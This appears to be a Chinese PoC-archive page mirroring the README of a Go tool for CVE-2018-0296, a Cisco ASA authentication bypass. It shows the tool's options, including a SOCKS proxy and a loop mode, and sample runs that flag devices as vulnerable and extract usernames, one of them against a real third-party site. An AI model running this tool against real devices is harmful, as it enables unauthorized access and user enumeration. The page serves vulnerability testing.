关联漏洞
描述
https://github.com/milo2012/CVE-2018-0296.git
介绍
# CVE-2018-0296
Test CVE-2018-0296 and extract usernames from Cisco ASA.
Refer to https://sekurak.pl/opis-bledu-cve-2018-0296-ominiecie-uwierzytelnienia-w-webinterfejsie-cisco-asa/ for more technical details.
#Help Menu
```
$ ./CVE-2018-0296 -h
Options:
-h, --help display help information
-u, --url Url of target device
-i IP of Socks Proxy
-p Port of Socks Proxy
-t, --time Number of seconds to sleep between loop
--loop Loop mode
```
#Usage Guide
```
$ ./CVE-2018-0296 -u https://x.x.x.x:443
[*] Checking: https://x.x.x.x:443
[+] https://x.x.x.x:443 [Cisco VPN]
[+] https://x.x.x.x:443 [Vulnerable]
[*] Usernames found
testuser1
$ ./CVE-2018-0296 -u https://www.yahoo.com:443
[*] Checking: https://www.yahoo.com
[+] https://www.yahoo.com [NOT Cisco VPN]
$ ./CVE-2018-0296 -u https://x.x.x.x:443
[*] Checking: https://x.x.x.x
[+] https://x.x.x.x [Cisco VPN]
[+] https://x.x.x.x [Vulnerable]
[*] No usernames found
$ ./CVE-2018-0296 -i 127.0.0.1 -p 10000 --loop 10 -u https://x.x.x.x:443
[*] Checking: https://x.x.x.x:443
[+] https://x.x.x.x:443 [Cisco VPN]
[+] https://x.x.x.x:443 [Vulnerable]
[*] Usernames found
testuser1
```
文件快照
[4.0K] /data/pocs/0fadf315490df2422f049fcabf6cd09952001b4b
├── [ 22K] CVE-2018-0296.go
├── [ 212] goreleaser.yml
└── [1.2K] README.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。